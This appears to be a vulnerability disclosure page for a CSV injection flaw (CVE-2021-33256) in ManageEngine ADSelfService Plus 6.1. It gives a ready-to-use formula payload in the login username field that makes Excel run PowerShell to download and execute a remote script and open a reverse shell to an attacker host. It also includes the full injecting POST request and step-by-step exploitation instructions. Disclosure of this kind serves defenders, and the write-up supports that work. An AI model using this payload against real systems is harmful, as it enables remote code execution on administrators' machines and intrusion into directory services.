> For the complete documentation index, see [llms.txt](https://docs.unsafe-inline.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection.md).

# ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)

### # Description

There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService can be exploited by unauthenticated user. `j_username` parameter seems to vulnerable and reverse shell could be obtained if privileged user exports *"User Attempts Audit Report"* as CSV file.

{% code title="Payload:" %}

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0
```

{% endcode %}

### # Proof Of Concept

**1-** Malicious user sends POST request to login page `https://TARGET-IP/j_security_check` and sets `j_username` parameter as like the above payload.

{% code title="j\_username parameter:" %}

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'
```

{% endcode %}

![](/files/-M_Hd80_mGdnuCpsXmEz)

{% code title="POST Request:" %}

```
POST /j_security_check HTTP/1.1
Host: 192.168.1.253:9251
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: https://192.168.1.253:9251
Connection: close
Referer: https://192.168.1.253:9251/j_security_check
Cookie: *
Upgrade-Insecure-Requests: 1

j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28
```

{% endcode %}

And the request attempt will be saved t&#x6F;*"User Attempts Audit Report"* table that is under the *Reports >  Audit Reports* section. `Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12`

`j_username` parameter value  is saved  to *"User Name"*  column which is start of line in the CSV file:

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://192.168.1.111/Invoke-PowerShellTcp.ps1')'
```

**2-** Powershell command that sends reverse shell to attacker machine is embeded to last line of the`Invoke-PowershellTcp.ps1` file.

![](/files/-M_Hdm82W7S5j24idP85)

**3-** If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user.&#x20;

![Exporting User Attempts Audit Report as CSV file](/files/-M_Hdfk8dtkLXiSQ1xX1)

![Confirmation for Starting Another Application](/files/-M_HgxXQHVXrioNdm5A8)

![Exported CSV file](/files/-M_Hh9213DUVogbg2RiQ)

![Getting Reverse Shell](/files/-M_HhDy80hcV0m5F5YfM)

{% embed url="<https://nvd.nist.gov/vuln/detail/CVE-2021-33256>" %}

{% embed url="<https://www.exploit-db.com/exploits/49885>" %}

```
# Author: Metin Yunus Kandemir
```

### # Reference

{% embed url="<https://owasp.org/www-community/attacks/CSV_Injection>" %}

{% embed url="<https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1>" %}
